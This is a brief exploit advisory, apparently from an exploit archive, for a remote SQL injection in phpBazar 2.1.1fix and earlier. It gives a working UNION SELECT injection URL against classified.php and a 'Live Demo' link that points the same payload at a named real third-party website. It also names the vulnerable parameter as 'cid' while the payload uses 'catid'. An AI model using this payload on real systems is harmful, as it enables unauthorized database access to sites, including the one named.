phpBazar versions 2.1.1fix and below suffer from a remote SQL injection vulnerability.
35422732f65845cb7bf2789b9b8160ffac6c15103e8b735b2efaa45d2818649d
/*
Author : MizoZ [from MA]
Group : EvilWay, evilway[at]mail[dot]com
Email : mizozx[at]gmail[dot]com
Greetz : Zuka, Dyle !!
MABROOK L3IIIIIIIIIID
*/
The vulnerability is in the $_GET['cid'] , exploit :
[HOST]/[PATH]/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--
Live Demo :
http://toutsurlegoldenretriever.fr/phpBazar-2.1.1fix/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--